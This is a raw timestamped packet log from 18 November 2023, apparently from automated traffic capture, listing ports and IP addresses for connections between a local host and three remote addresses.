Nov 18, 2023 10:02:36.286669970 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.286758900 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.286768913 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.286917925 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.289402962 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.289658070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.289715052 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.297646999 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.311882973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.323879004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.336720943 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.336776018 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.336857080 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.337296963 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.337315083 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.447403908 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:36.525681973 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:36.526680946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.526701927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.526798964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.526866913 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.526885033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.526890993 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.526901960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.526925087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.526942968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.526953936 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.526961088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.526976109 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.526997089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527007103 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527014017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527030945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527048111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527060986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527065039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527081966 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527086020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527105093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527122021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527122021 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527138948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527165890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527188063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527189016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527262926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527317047 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527398109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527468920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527493954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527512074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527529955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527545929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527545929 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527564049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527580023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527585030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527601957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527602911 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527620077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527637005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527645111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527654886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527673960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527683020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527690887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527700901 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527708054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527726889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527756929 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527791023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.527847052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527864933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.527934074 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528040886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528059006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528074980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528093100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528110027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528127909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528129101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528145075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528162003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528171062 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528179884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528191090 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528202057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528249979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528249979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528270006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528283119 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528285980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528304100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528318882 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528325081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528343916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528357983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528405905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528429985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528446913 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528610945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528629065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528646946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528665066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528664112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528701067 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528731108 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528899908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528918028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528934956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528963089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528971910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.528980017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.528997898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529032946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.529067039 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.529258966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529275894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529292107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529309034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529325962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529330015 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.529342890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529360056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529371023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.529377937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529387951 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.529398918 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529417992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.529443979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.529459953 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.529675961 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.530066967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.530086040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.530141115 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.530956984 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.535809994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.535854101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.535871983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.535890102 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.535950899 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.535988092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536118031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536174059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536190987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536209106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536226034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536226988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536245108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536262989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536279917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536281109 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536319017 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536333084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536339998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536386013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536405087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536425114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536437988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536473989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536505938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536523104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536540985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536591053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536602974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536622047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536640882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536653996 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536690950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536691904 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536711931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536730051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536755085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536775112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536802053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.536904097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.536995888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.537019014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.537035942 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.537054062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.537055016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.537086010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.537094116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.537105083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.537122965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.537139893 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.537173986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.537636995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.537656069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.537708044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.537914038 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.537982941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538002014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538052082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538101912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538120985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538136959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538156033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538172960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538176060 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538188934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538206100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538222075 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538228989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538249016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538256884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538275003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538292885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538297892 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538310051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538320065 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538327932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538345098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538358927 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538363934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538381100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538398027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538405895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538423061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538436890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538490057 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538693905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538713932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538738966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538759947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538777113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538791895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538794994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538811922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538832903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538836956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538849115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538856030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538867950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538888931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538889885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538913965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538925886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538932085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538949966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538966894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.538981915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.538985014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.539017916 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.539055109 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.539434910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.540293932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.540312052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.540329933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.540374994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.540380001 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.540436983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.543294907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.543313026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.543370008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.543778896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.543802023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.543853045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.543864012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.543870926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.543889999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.543915987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.543927908 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.543932915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.543965101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544045925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544092894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544111013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544126987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544142008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544145107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544162035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544178963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544178009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544194937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544212103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544214964 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544230938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544249058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544255018 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544265032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544281960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544287920 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544298887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544315100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544316053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544332981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544351101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544369936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544373989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544388056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544405937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544413090 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544421911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544440031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544441938 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544457912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544466019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544476032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544492006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544509888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544517040 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544528008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544545889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544553995 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544563055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544569969 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544580936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544600010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544620037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544631004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544639111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544656038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544661045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544672966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544682980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544692039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544708967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544709921 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544725895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544745922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544753075 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544763088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544780016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544796944 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544821024 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544827938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544882059 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.544917107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544934034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544954062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544970989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544986963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.544987917 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545023918 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545068979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545085907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545104027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545121908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545123100 CET	49744	80	192.168.2.4	194.49.94.120
